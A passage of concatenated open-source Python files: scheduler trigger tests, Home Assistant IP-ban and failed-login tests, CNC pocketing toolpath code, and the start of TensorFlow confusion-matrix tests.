correct_next_date = timezone.localize(datetime(2009, 2, 16))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_week_2(self, timezone):
trigger = CronTrigger(year=2009, week=15, day_of_week=2, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', week='15', day_of_week='2')>"
assert str(trigger) == "cron[year='2009', week='15', day_of_week='2']"
start_date = timezone.localize(datetime(2009, 1, 1))
correct_next_date = timezone.localize(datetime(2009, 4, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_extra_coverage(self, timezone):
# This test has no value other than patching holes in test coverage
trigger = CronTrigger(day='6,8', timezone=timezone)
assert repr(trigger) == "<CronTrigger (day='6,8')>"
assert str(trigger) == "cron[day='6,8']"
start_date = timezone.localize(datetime(2009, 12, 31))
correct_next_date = timezone.localize(datetime(2010, 1, 6))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_faulty_expr(self, timezone):
pytest.raises(ValueError, CronTrigger, year='2009-fault', timezone=timezone)
def test_cron_increment_weekday(self, timezone):
"""
Tests that incrementing the weekday field in the process of calculating the next matching date won't cause
problems.
"""
trigger = CronTrigger(hour='5-6', timezone=timezone)
assert repr(trigger) == "<CronTrigger (hour='5-6')>"
assert str(trigger) == "cron[hour='5-6']"
start_date = timezone.localize(datetime(2009, 9, 25, 7))
correct_next_date = timezone.localize(datetime(2009, 9, 26, 5))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_cron_bad_kwarg(self, timezone):
pytest.raises(TypeError, CronTrigger, second=0, third=1, timezone=timezone)
def test_timezone_from_start_date(self, timezone):
"""Tests that the trigger takes the timezone from the start_date parameter if no timezone is supplied."""
start_date = timezone.localize(datetime(2014, 4, 13, 5, 30))
trigger = CronTrigger(year=2014, hour=4, start_date=start_date)
assert trigger.timezone == start_date.tzinfo
def test_end_date(self, timezone):
end_date = timezone.localize(datetime(2014, 4, 13, 3))
trigger = CronTrigger(year=2014, hour=4, end_date=end_date)
start_date = timezone.localize(datetime(2014, 4, 13, 2, 30))
assert trigger.get_next_fire_time(None, start_date - timedelta(1)) == \
start_date.replace(day=12, hour=4, minute=0)
assert trigger.get_next_fire_time(None, start_date) is None
def test_different_tz(self, timezone):
alter_tz = pytz.FixedOffset(-600)
trigger = CronTrigger(year=2009, week=15, day_of_week=2, timezone=timezone)
assert repr(trigger) == "<CronTrigger (year='2009', week='15', day_of_week='2')>"
assert str(trigger) == "cron[year='2009', week='15', day_of_week='2']"
start_date = alter_tz.localize(datetime(2008, 12, 31, 22))
correct_next_date = timezone.localize(datetime(2009, 4, 8))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_dst_change(self):
"""
Making sure that CronTrigger works correctly when crossing the DST switch threshold.
Note that you should explicitly compare datetimes as strings to avoid the internal datetime comparison which
would test for equality in the UTC timezone.
"""
eastern = pytz.timezone('US/Eastern')
trigger = CronTrigger(minute='*/30', timezone=eastern)
datetime_edt = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=True)
correct_next_date = eastern.localize(datetime(2013, 11, 3, 1, 30), is_dst=True)
assert str(trigger.get_next_fire_time(None, datetime_edt)) == str(correct_next_date)
datetime_edt = eastern.localize(datetime(2013, 11, 3, 1, 35), is_dst=True)
correct_next_date = eastern.localize(datetime(2013, 11, 3, 1), is_dst=False)
assert str(trigger.get_next_fire_time(None, datetime_edt)) == str(correct_next_date)
def test_timezone_change(self, timezone):
"""
Ensure that get_next_fire_time method returns datetimes in the timezone of the trigger and not in the timezone
of the passed in start_date.
"""
est = pytz.FixedOffset(-300)
cst = pytz.FixedOffset(-360)
trigger = CronTrigger(hour=11, minute='*/5', timezone=est)
start_date = cst.localize(datetime(2009, 9, 26, 10, 16))
correct_next_date = est.localize(datetime(2009, 9, 26, 11, 20))
assert str(trigger.get_next_fire_time(None, start_date)) == str(correct_next_date)
class TestDateTrigger(object):
@pytest.mark.parametrize('run_date,alter_tz,previous,now,expected', [
(datetime(2009, 7, 6), None, None, datetime(2008, 5, 4), datetime(2009, 7, 6)),
(datetime(2009, 7, 6), None, None, datetime(2009, 7, 6), datetime(2009, 7, 6)),
(datetime(2009, 7, 6), None, None, datetime(2009, 9, 2), datetime(2009, 7, 6)),
('2009-7-6', None, None, datetime(2009, 9, 2), datetime(2009, 7, 6)),
(datetime(2009, 7, 6), None, datetime(2009, 7, 6), datetime(2009, 9, 2), None),
(datetime(2009, 7, 5, 22), pytz.FixedOffset(-60), datetime(2009, 7, 6), datetime(2009, 7, 6), None)
], ids=['earlier', 'exact', 'later', 'as text', 'previously fired', 'alternate timezone'])
def test_get_next_fire_time(self, run_date, alter_tz, previous, now, expected, timezone):
trigger = DateTrigger(run_date, alter_tz or timezone)
previous = timezone.localize(previous) if previous else None
now = timezone.localize(now)
expected = timezone.localize(expected) if expected else None
assert trigger.get_next_fire_time(previous, now) == expected
@pytest.mark.parametrize('is_dst', [True, False], ids=['daylight saving', 'standard time'])
def test_dst_change(self, is_dst):
"""
Making sure that DateTrigger works during the ambiguous "fall-back" DST period.
Note that you should explicitly compare datetimes as strings to avoid the internal datetime comparison which
would test for equality in the UTC timezone.
"""
eastern = pytz.timezone('US/Eastern')
run_date = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=is_dst)
fire_date = eastern.normalize(run_date + timedelta(minutes=55))
trigger = DateTrigger(run_date=fire_date, timezone=eastern)
assert str(trigger.get_next_fire_time(None, fire_date)) == str(fire_date)
def test_repr(self, timezone):
trigger = DateTrigger(datetime(2009, 7, 6), timezone)
assert repr(trigger) == "<DateTrigger (run_date='2009-07-06 00:00:00 CEST')>"
def test_str(self, timezone):
trigger = DateTrigger(datetime(2009, 7, 6), timezone)
assert str(trigger) == "date[2009-07-06 00:00:00 CEST]"
class TestIntervalTrigger(object):
@pytest.fixture()
def trigger(self, timezone):
return IntervalTrigger(seconds=1, start_date=datetime(2009, 8, 4, second=2), timezone=timezone)
def test_invalid_interval(self, timezone):
pytest.raises(TypeError, IntervalTrigger, '1-6', timezone=timezone)
def test_before(self, trigger, timezone):
"""Tests that if "start_date" is later than "now", it will return start_date."""
now = trigger.start_date - timedelta(seconds=2)
assert trigger.get_next_fire_time(None, now) == trigger.start_date
def test_within(self, trigger, timezone):
"""Tests that if "now" is between "start_date" and the next interval, it will return the next interval."""
now = trigger.start_date + timedelta(microseconds=1000)
assert trigger.get_next_fire_time(None, now) == trigger.start_date + trigger.interval
def test_no_start_date(self, timezone):
trigger = IntervalTrigger(seconds=2, timezone=timezone)
now = datetime.now(timezone)
assert (trigger.get_next_fire_time(None, now) - now) <= timedelta(seconds=2)
def test_different_tz(self, trigger, timezone):
alter_tz = pytz.FixedOffset(-60)
start_date = alter_tz.localize(datetime(2009, 8, 3, 22, second=2, microsecond=1000))
correct_next_date = timezone.localize(datetime(2009, 8, 4, 1, second=3))
assert trigger.get_next_fire_time(None, start_date) == correct_next_date
def test_end_date(self, timezone):
"""Tests that the interval trigger won't return any datetimes past the set end time."""
start_date = timezone.localize(datetime(2014, 5, 26))
trigger = IntervalTrigger(minutes=5, start_date=start_date, end_date=datetime(2014, 5, 26, 0, 7),
timezone=timezone)
assert trigger.get_next_fire_time(None, start_date + timedelta(minutes=2)) == start_date.replace(minute=5)
assert trigger.get_next_fire_time(None, start_date + timedelta(minutes=6)) is None
def test_dst_change(self):
"""
Making sure that IntervalTrigger works during the ambiguous "fall-back" DST period.
Note that you should explicitly compare datetimes as strings to avoid the internal datetime comparison which
would test for equality in the UTC timezone.
"""
eastern = pytz.timezone('US/Eastern')
start_date = datetime(2013, 6, 1) # Start within EDT
trigger = IntervalTrigger(hours=1, start_date=start_date, timezone=eastern)
datetime_edt = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=True)
correct_next_date = eastern.normalize(datetime_edt + timedelta(minutes=55))
assert str(trigger.get_next_fire_time(None, datetime_edt)) == str(correct_next_date)
datetime_est = eastern.localize(datetime(2013, 11, 3, 1, 5), is_dst=False)
correct_next_date = eastern.normalize(datetime_est + timedelta(minutes=55))
assert str(trigger.get_next_fire_time(None, datetime_est)) == str(correct_next_date)
def test_repr(self, trigger):
assert repr(trigger) == \
"<IntervalTrigger (interval=datetime.timedelta(0, 1), start_date='2009-08-04 00:00:02 CEST')>"
def test_str(self, trigger):
assert str(trigger) == "interval[0:00:01]"
| mit |
w1ll1am23/home-assistant | tests/components/http/test_ban.py | 8 | 7531 | """The tests for the Home Assistant HTTP component."""
# pylint: disable=protected-access
from ipaddress import ip_address
import os
from unittest.mock import Mock, mock_open, patch
from aiohttp import web
from aiohttp.web_exceptions import HTTPUnauthorized
from aiohttp.web_middlewares import middleware
import pytest
import homeassistant.components.http as http
from homeassistant.components.http import KEY_AUTHENTICATED
from homeassistant.components.http.ban import (
IP_BANS_FILE,
KEY_BANNED_IPS,
KEY_FAILED_LOGIN_ATTEMPTS,
IpBan,
setup_bans,
)
from homeassistant.components.http.view import request_handler_factory
from homeassistant.const import HTTP_FORBIDDEN
from homeassistant.setup import async_setup_component
from . import mock_real_ip
from tests.common import async_mock_service
SUPERVISOR_IP = "1.2.3.4"
BANNED_IPS = ["200.201.202.203", "100.64.0.2"]
BANNED_IPS_WITH_SUPERVISOR = BANNED_IPS + [SUPERVISOR_IP]
@pytest.fixture(name="hassio_env")
def hassio_env_fixture():
"""Fixture to inject hassio env."""
with patch.dict(os.environ, {"HASSIO": "127.0.0.1"}), patch(
"homeassistant.components.hassio.HassIO.is_connected",
return_value={"result": "ok", "data": {}},
), patch.dict(os.environ, {"HASSIO_TOKEN": "123456"}):
yield
@pytest.fixture(autouse=True)
def gethostbyaddr_mock():
"""Fixture to mock out I/O on getting host by address."""
with patch(
"homeassistant.components.http.ban.gethostbyaddr",
return_value=("example.com", ["0.0.0.0.in-addr.arpa"], ["0.0.0.0"]),
):
yield
async def test_access_from_banned_ip(hass, aiohttp_client):
"""Test accessing to server from banned IP. Both trusted and not."""
app = web.Application()
app["hass"] = hass
setup_bans(hass, app, 5)
set_real_ip = mock_real_ip(app)
with patch(
"homeassistant.components.http.ban.async_load_ip_bans_config",
return_value=[IpBan(banned_ip) for banned_ip in BANNED_IPS],
):
client = await aiohttp_client(app)
for remote_addr in BANNED_IPS:
set_real_ip(remote_addr)
resp = await client.get("/")
assert resp.status == HTTP_FORBIDDEN
@pytest.mark.parametrize(
"remote_addr, bans, status",
list(
zip(
BANNED_IPS_WITH_SUPERVISOR, [1, 1, 0], [HTTP_FORBIDDEN, HTTP_FORBIDDEN, 401]
)
),
)
async def test_access_from_supervisor_ip(
remote_addr, bans, status, hass, aiohttp_client, hassio_env
):
"""Test accessing to server from supervisor IP."""
app = web.Application()
app["hass"] = hass
async def unauth_handler(request):
"""Return a mock web response."""
raise HTTPUnauthorized
app.router.add_get("/", unauth_handler)
setup_bans(hass, app, 1)
mock_real_ip(app)(remote_addr)
with patch(
"homeassistant.components.http.ban.async_load_ip_bans_config", return_value=[]
):
client = await aiohttp_client(app)
assert await async_setup_component(hass, "hassio", {"hassio": {}})
m_open = mock_open()
with patch.dict(os.environ, {"SUPERVISOR": SUPERVISOR_IP}), patch(
"homeassistant.components.http.ban.open", m_open, create=True
):
resp = await client.get("/")
assert resp.status == 401
assert len(app[KEY_BANNED_IPS]) == bans
assert m_open.call_count == bans
# second request should be forbidden if banned
resp = await client.get("/")
assert resp.status == status
assert len(app[KEY_BANNED_IPS]) == bans
async def test_ban_middleware_not_loaded_by_config(hass):
"""Test accessing to server from banned IP when feature is off."""
with patch("homeassistant.components.http.setup_bans") as mock_setup:
await async_setup_component(
hass, "http", {"http": {http.CONF_IP_BAN_ENABLED: False}}
)
assert len(mock_setup.mock_calls) == 0
async def test_ban_middleware_loaded_by_default(hass):
"""Test accessing to server from banned IP when feature is off."""
with patch("homeassistant.components.http.setup_bans") as mock_setup:
await async_setup_component(hass, "http", {"http": {}})
assert len(mock_setup.mock_calls) == 1
async def test_ip_bans_file_creation(hass, aiohttp_client):
"""Testing if banned IP file created."""
notification_calls = async_mock_service(hass, "persistent_notification", "create")
app = web.Application()
app["hass"] = hass
async def unauth_handler(request):
"""Return a mock web response."""
raise HTTPUnauthorized
app.router.add_get("/", unauth_handler)
setup_bans(hass, app, 2)
mock_real_ip(app)("200.201.202.204")
with patch(
"homeassistant.components.http.ban.async_load_ip_bans_config",
return_value=[IpBan(banned_ip) for banned_ip in BANNED_IPS],
):
client = await aiohttp_client(app)
m_open = mock_open()
with patch("homeassistant.components.http.ban.open", m_open, create=True):
resp = await client.get("/")
assert resp.status == 401
assert len(app[KEY_BANNED_IPS]) == len(BANNED_IPS)
assert m_open.call_count == 0
resp = await client.get("/")
assert resp.status == 401
assert len(app[KEY_BANNED_IPS]) == len(BANNED_IPS) + 1
m_open.assert_called_once_with(hass.config.path(IP_BANS_FILE), "a")
resp = await client.get("/")
assert resp.status == HTTP_FORBIDDEN
assert m_open.call_count == 1
assert len(notification_calls) == 3
assert (
notification_calls[0].data["message"]
== "Login attempt or request with invalid authentication from example.com (200.201.202.204). See the log for details."
)
async def test_failed_login_attempts_counter(hass, aiohttp_client):
"""Testing if failed login attempts counter increased."""
app = web.Application()
app["hass"] = hass
async def auth_handler(request):
"""Return 200 status code."""
return None, 200
app.router.add_get(
"/auth_true", request_handler_factory(Mock(requires_auth=True), auth_handler)
)
app.router.add_get(
"/auth_false", request_handler_factory(Mock(requires_auth=True), auth_handler)
)
app.router.add_get(
"/", request_handler_factory(Mock(requires_auth=False), auth_handler)
)
setup_bans(hass, app, 5)
remote_ip = ip_address("200.201.202.204")
mock_real_ip(app)("200.201.202.204")
@middleware
async def mock_auth(request, handler):
"""Mock auth middleware."""
if "auth_true" in request.path:
request[KEY_AUTHENTICATED] = True
else:
request[KEY_AUTHENTICATED] = False
return await handler(request)
app.middlewares.append(mock_auth)
client = await aiohttp_client(app)
resp = await client.get("/auth_false")
assert resp.status == 401
assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 1
resp = await client.get("/auth_false")
assert resp.status == 401
assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 2
resp = await client.get("/")
assert resp.status == 200
assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 2
# This used to check that with trusted networks we reset login attempts
# We no longer support trusted networks.
resp = await client.get("/auth_true")
assert resp.status == 200
assert app[KEY_FAILED_LOGIN_ATTEMPTS][remote_ip] == 2
| apache-2.0 |
asmuelle/heekscnc | area_funcs.py | 24 | 15418 | import area
from nc.nc import *
import math
import kurve_funcs
# some globals, to save passing variables as parameters too much
area_for_feed_possible = None
tool_radius_for_pocket = None
def cut_curve(curve, need_rapid, p, rapid_safety_space, current_start_depth, final_depth):
prev_p = p
first = True
for vertex in curve.getVertices():
if need_rapid and first:
# rapid across
rapid(vertex.p.x, vertex.p.y)
##rapid down
rapid(z = current_start_depth + rapid_safety_space)
#feed down
feed(z = final_depth)
first = False
else:
if vertex.type == 1:
arc_ccw(vertex.p.x, vertex.p.y, i = vertex.c.x, j = vertex.c.y)
elif vertex.type == -1:
arc_cw(vertex.p.x, vertex.p.y, i = vertex.c.x, j = vertex.c.y)
else:
feed(vertex.p.x, vertex.p.y)
prev_p = vertex.p
return prev_p
def area_distance(a, old_area):
best_dist = None
for curve in a.getCurves():
for vertex in curve.getVertices():
c = old_area.NearestPoint(vertex.p)
d = c.dist(vertex.p)
if best_dist == None or d < best_dist:
best_dist = d
for curve in old_area.getCurves():
for vertex in curve.getVertices():
c = a.NearestPoint(vertex.p)
d = c.dist(vertex.p)
if best_dist == None or d < best_dist:
best_dist = d
return best_dist
def make_obround(p0, p1, radius):
dir = p1 - p0
d = dir.length()
dir.normalize()
right = area.Point(dir.y, -dir.x)
obround = area.Area()
c = area.Curve()
vt0 = p0 + right * radius
vt1 = p1 + right * radius
vt2 = p1 - right * radius
vt3 = p0 - right * radius
c.append(area.Vertex(0, vt0, area.Point(0, 0)))
c.append(area.Vertex(0, vt1, area.Point(0, 0)))
c.append(area.Vertex(1, vt2, p1))
c.append(area.Vertex(0, vt3, area.Point(0, 0)))
c.append(area.Vertex(1, vt0, p0))
obround.append(c)
return obround
def feed_possible(p0, p1):
if p0 == p1:
return True
obround = make_obround(p0, p1, tool_radius_for_pocket)
a = area.Area(area_for_feed_possible)
obround.Subtract(a)
if obround.num_curves() > 0:
return False
return True
def cut_curvelist1(curve_list, rapid_safety_space, current_start_depth, depth, clearance_height, keep_tool_down_if_poss):
p = area.Point(0, 0)
first = True
for curve in curve_list:
need_rapid = True
if first == False:
s = curve.FirstVertex().p
if keep_tool_down_if_poss == True:
# see if we can feed across
if feed_possible(p, s):
need_rapid = False
elif s.x == p.x and s.y == p.y:
need_rapid = False
if need_rapid:
rapid(z = clearance_height)
p = cut_curve(curve, need_rapid, p, rapid_safety_space, current_start_depth, depth)
first = False
rapid(z = clearance_height)
def cut_curvelist2(curve_list, rapid_safety_space, current_start_depth, depth, clearance_height, keep_tool_down_if_poss,start_point):
p = area.Point(0, 0)
start_x,start_y=start_point
first = True
for curve in curve_list:
need_rapid = True
if first == True:
direction = "on";radius = 0.0;offset_extra = 0.0; roll_radius = 0.0;roll_on = 0.0; roll_off = 0.0; rapid_safety_space; step_down = math.fabs(depth);extend_at_start = 0.0;extend_at_end = 0.0
kurve_funcs.make_smaller( curve, start = area.Point(start_x,start_y))
kurve_funcs.profile(curve, direction, radius , offset_extra, roll_radius, roll_on, roll_off, rapid_safety_space , clearance_height, current_start_depth, step_down , depth, extend_at_start, extend_at_end)
else:
s = curve.FirstVertex().p
if keep_tool_down_if_poss == True:
# see if we can feed across
if feed_possible(p, s):
need_rapid = False
elif s.x == p.x and s.y == p.y:
need_rapid = False
cut_curve(curve, need_rapid, p, rapid_safety_space, current_start_depth, depth)
first = False #change to True if you want to rapid back to start side before zigging again with unidirectional set
rapid(z = clearance_height)
def recur(arealist, a1, stepover, from_center):
# this makes arealist by recursively offsetting a1 inwards
if a1.num_curves() == 0:
return
if from_center:
arealist.insert(0, a1)
else:
arealist.append(a1)
a_offset = area.Area(a1)
a_offset.Offset(stepover)
# split curves into new areas
if area.holes_linked():
for curve in a_offset.getCurves():
a2 = area.Area()
a2.append(curve)
recur(arealist, a2, stepover, from_center)
else:
# split curves into new areas
a_offset.Reorder()
a2 = None
for curve in a_offset.getCurves():
if curve.IsClockwise():
if a2 != None:
a2.append(curve)
else:
if a2 != None:
recur(arealist, a2, stepover, from_center)
a2 = area.Area()
a2.append(curve)
if a2 != None:
recur(arealist, a2, stepover, from_center)
def get_curve_list(arealist, reverse_curves = False):
curve_list = list()
for a in arealist:
for curve in a.getCurves():
if reverse_curves == True:
curve.Reverse()
curve_list.append(curve)
return curve_list
curve_list_for_zigs = []
rightward_for_zigs = True
sin_angle_for_zigs = 0.0
cos_angle_for_zigs = 1.0
sin_minus_angle_for_zigs = 0.0
cos_minus_angle_for_zigs = 1.0
one_over_units = 1.0
def make_zig_curve(curve, y0, y, zig_unidirectional):
if rightward_for_zigs:
curve.Reverse()
# find a high point to start looking from
high_point = None
for vertex in curve.getVertices():
if high_point == None:
high_point = vertex.p
elif vertex.p.y > high_point.y:
# use this as the new high point
high_point = vertex.p
elif math.fabs(vertex.p.y - high_point.y) < 0.002 * one_over_units:
# equal high point
if rightward_for_zigs:
# use the furthest left point
if vertex.p.x < high_point.x:
high_point = vertex.p
else:
# use the furthest right point
if vertex.p.x > high_point.x:
high_point = vertex.p
zig = area.Curve()
high_point_found = False
zig_started = False
zag_found = False
for i in range(0, 2): # process the curve twice because we don't know where it will start
prev_p = None
for vertex in curve.getVertices():
if zag_found: break
if prev_p != None:
if zig_started:
zig.append(unrotated_vertex(vertex))
if math.fabs(vertex.p.y - y) < 0.002 * one_over_units:
zag_found = True
break
elif high_point_found:
if math.fabs(vertex.p.y - y0) < 0.002 * one_over_units:
if zig_started:
zig.append(unrotated_vertex(vertex))
elif math.fabs(prev_p.y - y0) < 0.002 * one_over_units and vertex.type == 0:
zig.append(area.Vertex(0, unrotated_point(prev_p), area.Point(0, 0)))
zig.append(unrotated_vertex(vertex))
zig_started = True
elif vertex.p.x == high_point.x and vertex.p.y == high_point.y:
high_point_found = True
prev_p = vertex.p
if zig_started:
if zig_unidirectional == True:
# remove the last bit of zig
if math.fabs(zig.LastVertex().p.y - y) < 0.002 * one_over_units:
vertices = zig.getVertices()
while len(vertices) > 0:
v = vertices[len(vertices)-1]
if math.fabs(v.p.y - y0) < 0.002 * one_over_units:
break
else:
vertices.pop()
zig = area.Curve()
for v in vertices:
zig.append(v)
curve_list_for_zigs.append(zig)
def make_zig(a, y0, y, zig_unidirectional):
for curve in a.getCurves():
make_zig_curve(curve, y0, y, zig_unidirectional)
reorder_zig_list_list = []
def add_reorder_zig(curve):
global reorder_zig_list_list
# look in existing lists
s = curve.FirstVertex().p
for curve_list in reorder_zig_list_list:
last_curve = curve_list[len(curve_list) - 1]
e = last_curve.LastVertex().p
if math.fabs(s.x - e.x) < 0.002 * one_over_units and math.fabs(s.y - e.y) < 0.002 * one_over_units:
curve_list.append(curve)
return
# else add a new list
curve_list = []
curve_list.append(curve)
reorder_zig_list_list.append(curve_list)
def reorder_zigs():
global curve_list_for_zigs
global reorder_zig_list_list
reorder_zig_list_list = []
for curve in curve_list_for_zigs:
add_reorder_zig(curve)
curve_list_for_zigs = []
for curve_list in reorder_zig_list_list:
for curve in curve_list:
curve_list_for_zigs.append(curve)
def rotated_point(p):
return area.Point(p.x * cos_angle_for_zigs - p.y * sin_angle_for_zigs, p.x * sin_angle_for_zigs + p.y * cos_angle_for_zigs)
def unrotated_point(p):
return area.Point(p.x * cos_minus_angle_for_zigs - p.y * sin_minus_angle_for_zigs, p.x * sin_minus_angle_for_zigs + p.y * cos_minus_angle_for_zigs)
def rotated_vertex(v):
if v.type:
return area.Vertex(v.type, rotated_point(v.p), rotated_point(v.c))
return area.Vertex(v.type, rotated_point(v.p), area.Point(0, 0))
def unrotated_vertex(v):
if v.type:
return area.Vertex(v.type, unrotated_point(v.p), unrotated_point(v.c))
return area.Vertex(v.type, unrotated_point(v.p), area.Point(0, 0))
def rotated_area(a):
an = area.Area()
for curve in a.getCurves():
curve_new = area.Curve()
for v in curve.getVertices():
curve_new.append(rotated_vertex(v))
an.append(curve_new)
return an
def zigzag(a, stepover, zig_unidirectional):
if a.num_curves() == 0:
return
global rightward_for_zigs
global curve_list_for_zigs
global sin_angle_for_zigs
global cos_angle_for_zigs
global sin_minus_angle_for_zigs
global cos_minus_angle_for_zigs
global one_over_units
one_over_units = 1 / area.get_units()
a = rotated_area(a)
b = area.Box()
a.GetBox(b)
x0 = b.MinX() - 1.0
x1 = b.MaxX() + 1.0
height = b.MaxY() - b.MinY()
num_steps = int(height / stepover + 1)
y = b.MinY() + 0.1 * one_over_units
null_point = area.Point(0, 0)
rightward_for_zigs = True
curve_list_for_zigs = []
for i in range(0, num_steps):
y0 = y
y = y + stepover
p0 = area.Point(x0, y0)
p1 = area.Point(x0, y)
p2 = area.Point(x1, y)
p3 = area.Point(x1, y0)
c = area.Curve()
c.append(area.Vertex(0, p0, null_point, 0))
c.append(area.Vertex(0, p1, null_point, 0))
c.append(area.Vertex(0, p2, null_point, 1))
c.append(area.Vertex(0, p3, null_point, 0))
c.append(area.Vertex(0, p0, null_point, 1))
a2 = area.Area()
a2.append(c)
a2.Intersect(a)
make_zig(a2, y0, y, zig_unidirectional)
if zig_unidirectional == False:
rightward_for_zigs = (rightward_for_zigs == False)
reorder_zigs()
def pocket(a,tool_radius, extra_offset, stepover, depthparams, from_center, keep_tool_down_if_poss, use_zig_zag, zig_angle, zig_unidirectional = False,start_point=None, cut_mode = 'conventional'):
global tool_radius_for_pocket
global area_for_feed_possible
#if len(a.getCurves()) > 1:
# for crv in a.getCurves():
# ar = area.Area()
# ar.append(crv)
# pocket(ar, tool_radius, extra_offset, rapid_safety_space, start_depth, final_depth, stepover, stepdown, clearance_height, from_center, keep_tool_down_if_poss, use_zig_zag, zig_angle, zig_unidirectional)
# return
tool_radius_for_pocket = tool_radius
if keep_tool_down_if_poss:
area_for_feed_possible = area.Area(a)
area_for_feed_possible.Offset(extra_offset - 0.01)
use_internal_function = (area.holes_linked() == False) # use internal function, if area module is the Clipper library
if use_internal_function:
curve_list = a.MakePocketToolpath(tool_radius, extra_offset, stepover, from_center, use_zig_zag, zig_angle)
else:
global sin_angle_for_zigs
global cos_angle_for_zigs
global sin_minus_angle_for_zigs
global cos_minus_angle_for_zigs
radians_angle = zig_angle * math.pi / 180
sin_angle_for_zigs = math.sin(-radians_angle)
cos_angle_for_zigs = math.cos(-radians_angle)
sin_minus_angle_for_zigs = math.sin(radians_angle)
cos_minus_angle_for_zigs = math.cos(radians_angle)
arealist = list()
a_offset = area.Area(a)
current_offset = tool_radius + extra_offset
a_offset.Offset(current_offset)
do_recursive = True
if use_zig_zag:
zigzag(a_offset, stepover, zig_unidirectional)
curve_list = curve_list_for_zigs
else:
if do_recursive:
recur(arealist, a_offset, stepover, from_center)
else:
while(a_offset.num_curves() > 0):
if from_center:
arealist.insert(0, a_offset)
else:
arealist.append(a_offset)
current_offset = current_offset + stepover
a_offset = area.Area(a)
a_offset.Offset(current_offset)
curve_list = get_curve_list(arealist, cut_mode == 'climb')
depths = depthparams.get_depths()
current_start_depth = depthparams.start_depth
if start_point==None:
for depth in depths:
cut_curvelist1(curve_list, depthparams.rapid_safety_space, current_start_depth, depth, depthparams.clearance_height, keep_tool_down_if_poss)
current_start_depth = depth
else:
for depth in depths:
cut_curvelist2(curve_list, depthparams.rapid_safety_space, current_start_depth, depth, depthparams.clearance_height, keep_tool_down_if_poss, start_point)
current_start_depth = depth
| bsd-3-clause |
xzturn/tensorflow | tensorflow/python/kernel_tests/confusion_matrix_test.py | 8 | 18371 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for confusion_matrix_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import confusion_matrix
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
class ConfusionMatrixTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes
def testExample(self):
"""This is a test of the example provided in pydoc."""
with self.cached_session():
self.assertAllEqual([
[0, 0, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 1]
], self.evaluate(confusion_matrix.confusion_matrix(
labels=[1, 2, 4], predictions=[2, 2, 4])))
def _testConfMatrix(self, labels, predictions, truth, weights=None,
num_classes=None):
with self.cached_session():
dtype = predictions.dtype
ans = confusion_matrix.confusion_matrix(
labels, predictions, dtype=dtype, weights=weights,
num_classes=num_classes).eval()
self.assertAllClose(truth, ans, atol=1e-10)
self.assertEqual(ans.dtype, dtype)
def _testBasic(self, dtype):
labels = np.arange(5, dtype=dtype)
predictions = np.arange(5, dtype=dtype)
truth = np.asarray(
[[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]],
dtype=dtype)
self._testConfMatrix(labels=labels, predictions=predictions, truth=truth)
@test_util.run_deprecated_v1
def testInt32Basic(self):
self._testBasic(dtype=np.int32)
@test_util.run_deprecated_v1
def testInt64Basic(self):
self._testBasic(dtype=np.int64)
def _testConfMatrixOnTensors(self, tf_dtype, np_dtype):
with self.cached_session() as sess:
m_neg = array_ops.placeholder(dtype=dtypes.float32)
m_pos = array_ops.placeholder(dtype=dtypes.float32)
s = array_ops.placeholder(dtype=dtypes.float32)
neg = random_ops.random_normal(
[20], mean=m_neg, stddev=s, dtype=dtypes.float32)
pos = random_ops.random_normal(
[20], mean=m_pos, stddev=s, dtype=dtypes.float32)
data = array_ops.concat([neg, pos], 0)
data = math_ops.cast(math_ops.round(data), tf_dtype)
data = math_ops.minimum(math_ops.maximum(data, 0), 1)
lab = array_ops.concat(
[
array_ops.zeros(
[20], dtype=tf_dtype), array_ops.ones(
[20], dtype=tf_dtype)
],
0)
cm = confusion_matrix.confusion_matrix(
lab, data, dtype=tf_dtype, num_classes=2)
d, l, cm_out = sess.run([data, lab, cm], {m_neg: 0.0, m_pos: 1.0, s: 1.0})
truth = np.zeros([2, 2], dtype=np_dtype)
for i in xrange(len(d)):
truth[l[i], d[i]] += 1
self.assertEqual(cm_out.dtype, np_dtype)
self.assertAllClose(cm_out, truth, atol=1e-10)
@test_util.run_deprecated_v1
def testOnTensors_int32(self):
self._testConfMatrixOnTensors(dtypes.int32, np.int32)
@test_util.run_deprecated_v1
def testOnTensors_int64(self):
self._testConfMatrixOnTensors(dtypes.int64, np.int64)
def _testDifferentLabelsInPredictionAndTarget(self, dtype):
labels = np.asarray([4, 5, 6], dtype=dtype)
predictions = np.asarray([1, 2, 3], dtype=dtype)
truth = np.asarray(
[[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0],
